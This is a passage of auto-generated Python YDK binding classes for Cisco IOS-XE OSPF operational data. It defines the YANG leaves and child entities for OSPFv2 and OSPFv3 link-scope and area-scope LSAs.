self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class UnknownSubTlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + 